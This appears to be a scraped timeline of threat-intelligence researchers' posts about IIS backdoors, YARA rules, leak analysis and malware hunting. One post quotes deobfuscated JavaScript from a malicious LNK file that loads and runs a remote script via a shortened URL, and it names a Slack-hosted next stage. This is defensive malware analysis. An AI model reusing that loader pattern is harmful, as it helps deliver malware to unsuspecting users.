John

I've released a short blog on IIS malware: pwc.com/gx/en/issues/c… In it, I give an overview of some IIS malware research that has been done already, present a case study into a custom backdoor I found earlier in the year, and release some tooling to help analyse IIS modules!

Amazing work as always @nao_sec ! For folks hunting for this stuff, I've got some YARA rules + these IoCs published here from my @labscon_io talk on IIS malware: github.com/PwCUK-CTO/labs… In particular, the "Malware_IIS_reGeorg_Unique_Strings" rule will be of use for this stuff!

High signal phishing cluster IoCs released - github.com/ext-jack/threa…

@Myrtus0x0 You on your first call back at work (congrats on finishing in top 10!!!)

Happy to be done 😤ended up taking time off of work to focus 100% on flare. Was absolutely brutal to say the least, my last solve was at almost 5am before needing to be in a meeting at 7 🥲 future #flareon11's are gonna be a lot more chill, ill tell ya that 😅

I did some new research. Enjoy! Detecting a business email compromise (BEC) threat actor - threatintelligence.substack.com/p/detecting-a-…

Following recent reporting by The Citizen Lab and AccessNow on #COLDWASTREL (which we track as White Dev 185), we've put out a blog detailing some further infrastructure of the threat actor, and historic connections to other threat actors: pwc.com/gx/en/issues/c…

Nice research from Check Point. I've blogged about the SessionsIIS backdoor last year, which they mention in their research: pwc.com/gx/en/issues/c… Timely research as well, as I'll also be mentioning these backdoors at @labscon_io next week.

@greglesnewich @labscon_io Thanks man, it'll be a beautiful day when our paths finally cross at one of these conferences 🤝

@BitsOfBinary @labscon_io so bummed im gonna miss this one, you're gonna crush it my dude!

I'm very excited to be speaking at @labscon_io about IIS malware! The whole agenda looks incredible, so I'm honoured to be able to present, and looking forward to seeing everyone who will be attending 😁

For anyone using Binary Ninja and wanting to use Mandiant's ShellcodeHashes IDA plugin-I ported a basic version of the IDA plugin to Binary Ninja: github.com/PwCUK-CTO/Bina… Known limitations - No GUI, no support for searching memory constants - but it works well for most use cases

Useful stuff to learn here, whether you're new to or experienced with #YARA!

@jamieantisocial @casey_knerr @MITREattack Good luck at your next place - my engagement with a MITRE ATT&CK has increased significantly because of you 🫡

today is my last day at MITRE 🥹 but this tweet is 🅽🅾🆃 about me...you should go follow @casey_knerr 🚨🚨🚨 She has been leading @MITREattack for ☁️ & now all of Enterprise. Casey is an all around AWESOME human 👑🪁

@KevinPerlow It's been a while! Thank you for posting again 😁

Some North Korean post infection malware. Nothing groundbreaking, I just always like to see the actual code when vendors gloss over it: norfolkinfosec.com/north-koreas-p… I’ve included hashes where the files were on VT, if you want to grab them to look for yourself.

@1ZRR4H @58_158_177_102 @JAMESWT_MHT @pr0xylife @executemalware @0xToxin @ankit_anubhav @StopMalvertisin @RussianPanda9xx These are cool LNKs, but I get the feeling they're old (potentially from 2018) based on metadata and theme. Not sure why they've been uploaded now

▪ Interesting, "document.doc.lnk": 1058fe85419ee7dce9a30f9c31804d854c6749a6f4589fb1238d66ef9694346e Deobfuscated .LNK code: JaVAsCrIpT: fpNRzOcT1EQkD2UtK5LA6Bdoa0IWvjXixM9qGg = "moveTo(4008,4260);try{GetObject('script:https://goo[.]gl/nEenP8').hiiO()}catch(e){}close()" this.eval(fpNRzOcT1EQkD2UtK5LA6Bdoa0IWvjXixM9qGg) Next stage on #Slack: https://files-origin.slack[.]com/files-pri/TCVARGJTF-FCV2JNMDZ/download/f763b5c8?pub_secret=c98a7dd98a (not found now) 🧐 Other filenames: - Bolsonaro_Haddad.mp4.lnk - Comprovante.doc.lnk H/T @malwrhunterteam

@jstrosch Be careful handling LNK files! Even if you change the file extension, trying to do something like "Editing with Notepad++" will resolve the LNK to the target executable. Usually this is fine as it might just open "cmd.exe", but I'm extra careful handling them as a result.

We all make mistakes, particularly when handling #malware! However, these mistakes often provide learning opportunities - what's one you learned the hard way or found very important? #malwareanalysis #reverseengineering

Analyzing data leaks is a very interesting Intel challenge, especially when you’re dealing with a foreign language 🤓 The I-SOON leak, which contains mostly PNG files of screenshots of documents, is a good example 🔎 Last night, I created a Notebook to automatically process and analyze the data to speed up your investigation. Here is my process 👇 🧵 If you don't want to read the thread, you can directly jump to the notebook here: jupyter.securitybreak.io/ISOON_DataLeak… #infosec #isoon #leak #threatintel #llm #python #jupyter

Invaluable advice right here. The more YARA rules I write, the more I prefer having shorter, less complex ones. That doesn't mean you can't have a complicated condition or set of strings, but imo it's a good idea to have one "idea" per rule, where possible

@Hexacorn @cyb3rops Might be a cool thing to suggest adding to this: github.com/CybercentreCan…

Q: do you guys test your YARA rules before you publish them? I mean - at least on a small goodware set? #100DaysofYARA (cause I see even well-known vendors release rules that trigger thousands of FPs - we call them crap rules here; don’t know how you call them)

@ex_raritas Sounds like the opposite of a broken rule 😎

TFW your broken YARA rule is surprisingly good at finding backdoored WAREZ. #100daysofYARA

@stvemillertime I can't wait to see you make rules that write rules that write rules. Or the ultimate challenge: write a YARA rule that can create all other YARA rules. The "YARA rule of everything".

You *could* use a YARA rule to create more YARA rules. Say you like a feature extracted by a YARA module, you can craft a YARA rule that will by itself parse that feature and print out a precise rule for it. Play with it, maybe it could be fun. github.com/stvemillertime…

@greglesnewich @stvemillertime @captainGeech42 Very nice 👌

big time #100DaysofYARA collab after triaging the BlackWood samples that ESET found, @stvemillertime shared some rules that hit, including a loose hunt for VirtualAlloc making RWX allocs @captainGeech42 came over the top and added the tasty func.rva to make it extra precise